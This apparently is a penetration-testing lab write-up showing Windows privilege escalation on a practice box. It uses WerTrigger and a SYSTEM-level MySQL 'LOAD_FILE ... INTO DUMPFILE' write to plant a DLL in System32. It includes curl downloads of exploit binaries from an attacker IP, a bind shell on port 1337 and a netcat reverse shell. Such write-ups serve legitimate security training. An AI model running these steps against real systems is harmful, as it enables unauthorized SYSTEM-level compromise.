Privilege File Write (WerTriggeer)
It has been identified that privileged file write as SYSTEM can be achieved via mysql session as the internal MySQL instance is running as SYSTEM
/Practice/Craft2/5-Privilege_Escalation/attachments/{CD77F858-0E2F-418C-9FC5-7B08BBC1D640}.png)
4 known exploit paths are available for privileged file write, and 2 of them are working across all versions of Windows as of today (July 2025).
I will be deploying the WerTrigger method because the other one, WerMgr, requires directory creation.
Exploit
/Practice/Craft2/5-Privilege_Escalation/attachments/{ACA3ADB0-F63A-4BF6-B64C-E8D5828373C6}.png)
Exploit located
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ git clone https://github.com/sailay1996/WerTrigger
Cloning into 'WerTrigger'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (1/1), done.
remote: Total 92 (delta 0), reused 0 (delta 0), pack-reused 91 (from 1)
Receiving objects: 100% (92/92), 187.38 KiB | 3.90 MiB/s, done.
Resolving deltas: 100% (33/33), done.Cloning the repo
Exploitation
Privileged file write is only accessible through the mysql session.
PS C:\tmp> mkdir WerTrigger
Directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/4/2025 12:48 PM WerTrigger
PS C:\tmp\WerTrigger> curl http://192.168.45.158/WerTrigger/bin/phoneinfo.dll -OutFile .\phoneinfo.dll
PS C:\tmp\WerTrigger> curl http://192.168.45.158/WerTrigger/bin/WerTrigger.exe -OutFile .\WerTrigger.exe
PS C:\tmp\WerTrigger> curl http://192.168.45.158/WerTrigger/bin/Report.wer -OutFile .\Report.werTransferring the necessary binaries.
MariaDB [(none)]> SELECT LOAD_FILE('C://tmp//WerTrigger//phoneinfo.dll') INTO DUMPFILE 'C://Windows//System32//phoneinfo.dll';
Query OK, 1 row affected (0.037 sec)Transferring the DLL file to the C:\Windows\System32 directory as SYSTEM
It’s CRITICAL to use DUMPFILE instead of OUTFILE
PS C:\tmp\WerTrigger> icacls C:\Windows\System32\phoneinfo.dll
C:\Windows\System32\phoneinfo.dll NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
PS C:\tmp\WerTrigger> ls C:\Windows\System32\phoneinfo.dll
Directory: C:\Windows\System32
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/4/2025 12:42 PM 12288 phoneinfo.dllWrite as SYSTEM confirmed.
PS C:\tmp\WerTrigger> .\WerTrigger.exe
[+] Windows Error Reporting Trigger by @404death !
[+] Trigger launched.
[*] TCP connecting...
[*] Waiting for the DLL to be loaded...
[-] Unable to connect to server!
[*] Retrying ...
[-] Unable to connect to server!
[*] Retrying ...
[-] Unable to connect to server!
[-] Exploit failed.However, the exploit fails with the error; Unable to connect to server!
Trouble Shooting
/Practice/Craft2/5-Privilege_Escalation/attachments/{A463B3C2-47BE-43BA-968B-DB0FFA3D7C68}.png)
/Practice/Craft2/5-Privilege_Escalation/attachments/{E17A48B6-8086-4B5B-80E3-9EAB0411561E}.png)
Checking the source code reveals that;
WerTrigger.exebinary triggers loading thephoneinfo.dllDLLphoneinfo.dllDLL gets loaded asSYSTEM- then it creates a bind shell internally on the port
1337
- then it creates a bind shell internally on the port
WerTrigger.exebinary then connects to the bind shell on the port1337
The problem is inbound connection to 1337 failed.
I can attempt to connect to the port 1337 manually.
Re-attempt (manual)
/Practice/Craft2/5-Privilege_Escalation/attachments/{D0EBB9CE-0F38-4144-A521-110BED32592B}.png)
Executing the WerTrigger.exe binary
/Practice/Craft2/5-Privilege_Escalation/attachments/{D49D26F0-A29F-48B9-90F8-D0ED1698AB5B}.png)
The bind shell is internally running on the port 1337
/Practice/Craft2/5-Privilege_Escalation/attachments/{FAD29E38-CEA0-41DE-87B4-20F9F277038B}.png)
On a separate session, I can connect to the bind shell using the Netcat binary
/Practice/Craft2/5-Privilege_Escalation/attachments/{2AB1DACB-1D16-4AF3-9BA5-D39C468BC876}-1.png)
Supposedly, we are connect to a CMD session despite not showing the prompt.
/Practice/Craft2/5-Privilege_Escalation/attachments/{24F2E874-DF68-4F19-B363-D558F8033B58}.png)
So I can send a Netcat reverse shell to Kali
/Practice/Craft2/5-Privilege_Escalation/attachments/{B90F6614-52CF-4D03-B749-C8D316246610}.png)
It worked.
System level compromise
/Practice/Craft2/5-Privilege_Escalation/attachments/{558E0435-1C62-486B-A532-AA021095D79B}.png)
It indeed shows the established session, which has a different PID; 1064
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> ps
[...REDACTED...]
154 11 1756 1476 0.02 4608 0 wermgr
91 6 908 3616 0.00 1064 0 WerTrigger 4608 is the wermgr process
1064 is the WerTrigger process, which is the current session as SYSTEM